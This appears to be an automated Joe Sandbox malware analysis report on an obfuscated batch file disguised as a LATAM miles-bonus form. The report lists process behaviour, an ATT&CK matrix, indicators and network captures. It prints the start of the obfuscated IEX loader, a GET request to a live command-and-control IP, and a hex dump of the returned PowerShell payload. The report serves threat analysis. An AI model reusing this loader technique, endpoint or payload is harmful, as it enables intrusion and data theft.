    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    System Network Configuration Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd3%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    ipinfo.io
    34.117.59.81
    truefalse
      unknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://172.104.150.66/contadores/pCK0xoI.php?4Fg0=7CWdVPWuoeIbH5GfMQlhkLVOOLluKpESrzGGXh7u3gGckRvxeoKC18Y6sPgy2viFd7mtrue
          unknown
          http://ipinfo.io/jsonfalse
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            34.117.59.81
            ipinfo.ioUnited States
            139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
            172.104.150.66
            unknownUnited States
            63949LINODE-APLinodeLLCUStrue
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1545639
            Start date and time:2024-10-30 19:11:06 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 2m 17s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd
            Detection:MAL
            Classification:mal64.evad.winCMD@8/4@1/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .cmd
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): dllhost.exe
            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 52.165.164.15
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd
            TimeTypeDescription
            14:11:59API Interceptor37x Sleep call for process: powershell.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            34.117.59.81172.104.150.66.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            UjbjOP.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            licarisan_api.exeGet hashmaliciousIcarusBrowse
            • ipinfo.io/ip
            build.exeGet hashmaliciousUnknownBrowse
            • ipinfo.io/ip
            YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            lePDF.cmdGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
            • ipinfo.io/json
            mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
            • ipinfo.io/json
            172.104.150.66172.104.150.66.ps1Get hashmaliciousUnknownBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ipinfo.io172.104.150.66.ps1Get hashmaliciousUnknownBrowse
              • 34.117.59.81
              app64.exeGet hashmaliciousUnknownBrowse
              • 34.117.59.81
              PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 34.117.59.81
              https://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
              • 34.117.59.81
              VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
              • 34.117.59.81
              kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
              • 34.117.59.81
              sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
              • 34.117.59.81
              uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
              • 34.117.59.81
              wOP5sowoN1.exeGet hashmaliciousUnknownBrowse
              • 34.117.59.81
              oD0N44Ka53.exeGet hashmaliciousUnknownBrowse
              • 34.117.59.81
              fp2e7a.wpc.phicdn.net67JPbskewt.exeGet hashmaliciousUnknownBrowse
              • 192.229.221.95
              file.exeGet hashmaliciousLummaCBrowse
              • 192.229.221.95
              https://register.edx.org/verizon?&utm_source=vsf_e_paid-ggl-ubrnd&utm_medium=cpc&utm_campaign=GGL%7CEDX%7CAI%7CVSF%7CSEM%7CNBD%7CUS&gad_source=1&gclid=Cj0KCQjwj4K5BhDYARIsAD1Ly2pyzBeRgn77ojfsMTtg7r8SaT93hKq6Ob_f1zsDj7Kj8dy-Mn9a7tMaAng3EALw_wcB&_gl=1*1dphwek*_gcl_aw*R0NMLjE3MzAyMTU4NDAuQ2owS0NRandqNEs1QmhEWUFSSXNBRDFMeTJweXpCZVJnbjc3b2pmc01UdGc3cjhTYVQ5M2hLcTZPYl9mMXpzRGo3S2o4ZHktTW45YTd0TWFBbmczRUFMd193Y0I.*_gcl_au*MzQxNzQzMjE1LjE3MzAyMTU4Mzg.*_ga*MTE0OTEyNzE2Ni4xNzMwMjE1ODM5*_ga_D3KS4KMDT0*MTczMDIxNTgzOS4xLjAuMTczMDIxNTgzOS42MC4wLjAGet hashmaliciousUnknownBrowse
              • 192.229.221.95
              https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
              • 192.229.221.95
              https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
              • 192.229.221.95
              https://cosiosos.com.de/7i2ko/Get hashmaliciousHTMLPhisherBrowse
              • 192.229.221.95
              https://myworkspacec1d73.myclickfunnels.com/onlinereview--9cb35?preview=trueGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
              • 192.229.221.95
              http://ffcu.onlineGet hashmaliciousUnknownBrowse
              • 192.229.221.95
              https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963Get hashmaliciousKnowBe4Browse
              • 192.229.221.95
              https://www.guidedtrack.com/programs/n5snx1a/runGet hashmaliciousUnknownBrowse
              • 192.229.221.95
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              GOOGLE-AS-APGoogleAsiaPacificPteLtdSG172.104.150.66.ps1Get hashmaliciousUnknownBrowse
              • 34.117.59.81
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
              • 34.117.239.71
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 34.117.188.166
              LINODE-APLinodeLLCUS172.104.150.66.ps1Get hashmaliciousUnknownBrowse
              • 172.104.150.66
              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
              • 69.164.216.107
              https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
              • 69.164.216.107
              http://mhmgc.com/Get hashmaliciousHTMLPhisherBrowse
              • 66.228.55.103
              INVOICES.exeGet hashmaliciousFormBookBrowse
              • 45.79.252.94
              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
              • 178.79.191.151
              https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/Get hashmaliciousUnknownBrowse
              • 192.155.94.132
              ppc.elfGet hashmaliciousUnknownBrowse
              • 176.58.114.154
              payload.dllGet hashmaliciousUnknownBrowse
              • 45.33.53.179
              payload.dllGet hashmaliciousUnknownBrowse
              • 45.33.53.179
              No context
              No context
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):46
              Entropy (8bit):4.689550478304832
              Encrypted:false
              SSDEEP:3:KON+E2J5cHdm3n:KON723cHkn
              MD5:93DA6B0AF3CDAF654847FFA62CA58CB3
              SHA1:82C282D593DD2C304E5DEACA07862476B6087608
              SHA-256:D242BF30ABD0AC2FD1AA5EA5C313D0CC70186DCD4E7EB3FD2C6C1730F1E480A4
              SHA-512:37E9B606323286C1D2C350B30B4E3944706FC7668369B0EBF7E49D1278CA7D267F7DA68A345D907969CECDAEDFCCCB6C90E16764B51CA44BBAB9B5D260B61036
              Malicious:false
              Reputation:low
              Preview:.C:\Users\user\AppData\Local\yyS8Cw2Gg..
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):2920
              Entropy (8bit):5.449039162601703
              Encrypted:false
              SSDEEP:48:4OAzsSU4y4RQmFoUeCamfm9qr9t5/78Nfk+qGxJZKaVEouYAgwd64rHLjtvW/:1AzlHyIFKL2O9qrh7KfkYJ5Eo9AdrxG
              MD5:7CAD2E7230D0BC7406A7C14BD7844650
              SHA1:D0595D08811D5D0413282EE7D8AC115184F5388D
              SHA-256:1458CC3EF291AE8AD4467C66F1C1E43C2CFFA0B881BFE4DCA196FDC5A9141D4E
              SHA-512:767AA71896971124556A698EA6633B738E3BBD6BE316E69AFAF5FECEC4CB573E17D90B6CF8E40F16C28A33A56472AFB8317A90050BEB3CDFD57E9884BC4024CE
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              File type:DOS batch file, ASCII text, with very long lines (61847), with CRLF line terminators
              Entropy (8bit):4.003065201569323
              TrID:
                File name:FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd
                File size:11'373'396 bytes
                MD5:79c7b5a0efe2c269321b4f082e1efab1
                SHA1:cc3a038e4f505f5f83ccb2994adb5cc6d29f594b
                SHA256:890c0c8d8d06a37b866b875bd679c8147a4a4c3dd8dbc5f0c072630b31d035e0
                SHA512:0126a51ce27e05386f76f5db3fe43a802ea95e47afa7e4ba538934406aa6a2eac1ac6af0e0a9c56e29779a66b2064a31fe87ac85967041d35fe737500eab4ea8
                SSDEEP:24576:5bhwZ8RRx1mFE2hrApik32Ibx0XRArRLGMoANf8IBeeCQLw6x4zaxb9nMpsIvx4K:k
                TLSH:A3B6BFF876047DE6266F576BDA96ACDC13B627239ACBA4CC8064B7C30563375FE02805
                File Content Preview:@echo off..set qFl3mdvBMfg^=k h}gw9?)]+4{5v1u2o=bj86fnp-3rq"/x0zci:emds'.tal;[(y7..set VTXm22MebfrD^=%qFl3mdvBMfg:~37,1%%qFl3mdvBMfg:~39,1%%qFl3mdvBMfg:~33,1%%qFl3mdvBMfg:~50,1%%qFl3mdvBMfg:~31,1%IEX%qFl3mdvBMfg:~50,1%N%qFl3mdvBMfg:~39,1%%qFl3mdvBMfg:~5,1
                Icon Hash:9686878b929a9886
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-30T19:12:03.035929+01002055903ET MALWARE PS1/ExfiltracaoBot CnC Checkin1192.168.2.649712172.104.150.668901TCP
                TimestampSource PortDest PortSource IPDest IP
                Oct 30, 2024 19:12:00.658901930 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:00.664491892 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:00.664596081 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:00.664819956 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:00.670526981 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515400887 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515443087 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515467882 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515552044 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:01.515713930 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515738964 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515763044 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.515780926 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:01.515819073 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:01.516025066 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.516050100 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.516112089 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:01.516272068 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.520215034 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.520282984 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:01.521246910 CET8049709172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:01.571445942 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:02.336014986 CET4971180192.168.2.634.117.59.81
                Oct 30, 2024 19:12:02.341540098 CET804971134.117.59.81192.168.2.6
                Oct 30, 2024 19:12:02.341676950 CET4971180192.168.2.634.117.59.81
                Oct 30, 2024 19:12:02.344808102 CET4971180192.168.2.634.117.59.81
                Oct 30, 2024 19:12:02.350193024 CET804971134.117.59.81192.168.2.6
                Oct 30, 2024 19:12:02.960133076 CET804971134.117.59.81192.168.2.6
                Oct 30, 2024 19:12:03.008928061 CET4971180192.168.2.634.117.59.81
                Oct 30, 2024 19:12:03.012726068 CET497128901192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:03.018124104 CET890149712172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:03.018205881 CET497128901192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:03.035928965 CET497128901192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:03.041349888 CET890149712172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:03.839008093 CET890149712172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:03.843096972 CET497128901192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:03.849787951 CET890149712172.104.150.66192.168.2.6
                Oct 30, 2024 19:12:03.849869013 CET497128901192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:04.007859945 CET4970980192.168.2.6172.104.150.66
                Oct 30, 2024 19:12:04.008022070 CET4971180192.168.2.634.117.59.81
                TimestampSource PortDest PortSource IPDest IP
                Oct 30, 2024 19:12:02.326909065 CET5621853192.168.2.61.1.1.1
                Oct 30, 2024 19:12:02.335195065 CET53562181.1.1.1192.168.2.6
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 30, 2024 19:12:02.326909065 CET192.168.2.61.1.1.10xa717Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 30, 2024 19:12:02.335195065 CET1.1.1.1192.168.2.60xa717No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                Oct 30, 2024 19:12:14.848249912 CET1.1.1.1192.168.2.60x4e5cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                Oct 30, 2024 19:12:14.848249912 CET1.1.1.1192.168.2.60x4e5cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                • 172.104.150.66
                • ipinfo.io
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.649709172.104.150.66804140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Oct 30, 2024 19:12:00.664819956 CET159OUTGET /contadores/pCK0xoI.php?4Fg0=7CWdVPWuoeIbH5GfMQlhkLVOOLluKpESrzGGXh7u3gGckRvxeoKC18Y6sPgy2viFd7m HTTP/1.1
                Host: 172.104.150.66
                Connection: Keep-Alive
                Oct 30, 2024 19:12:01.515400887 CET1236INHTTP/1.1 200 OK
                Date: Wed, 30 Oct 2024 18:12:01 GMT
                Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.39
                X-Powered-By: PHP/5.6.39
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 32 30 33 63 0d 0a 66 75 6e 63 74 69 6f 6e 20 50 74 56 30 67 7a 44 7a 44 74 20 7b 0a 20 20 20 20 70 61 72 61 6d 20 28 0a 20 20 20 20 20 20 20 20 5b 69 6e 74 5d 24 53 4a 54 73 48 75 78 49 57 36 20 3d 20 24 61 72 67 73 5b 30 5d 0a 20 20 20 20 29 0a 0a 20 20 20 20 0a 20 20 20 20 24 50 41 70 48 77 7a 78 57 4c 63 20 3d 20 28 36 35 2e 2e 39 30 29 20 2b 20 28 39 37 2e 2e 31 32 32 29 20 2b 20 28 34 38 2e 2e 35 37 29 0a 0a 20 20 20 20 24 4b 37 48 72 32 33 49 48 4a 53 20 3d 20 66 6f 72 65 61 63 68 20 28 24 63 33 55 72 6d 63 56 6a 6f 4a 20 69 6e 20 28 31 2e 2e 24 53 4a 54 73 48 75 78 49 57 36 29 29 20 7b 0a 20 20 20 20 20 20 20 20 24 49 65 34 6b 44 61 38 77 79 6f 20 3d 20 47 65 74 2d 52 61 6e 64 6f 6d 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 50 41 70 48 77 7a 78 57 4c 63 0a 20 20 20 20 20 20 20 20 5b 63 68 61 72 5d 24 49 65 34 6b 44 61 38 77 79 6f 0a 20 20 20 20 7d 0a 0a 20 20 20 20 72 65 74 75 72 6e 20 2d 6a 6f 69 6e 20 24 4b 37 48 72 32 33 49 48 4a 53 0a 7d 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 70 46 49 50 [TRUNCATED]
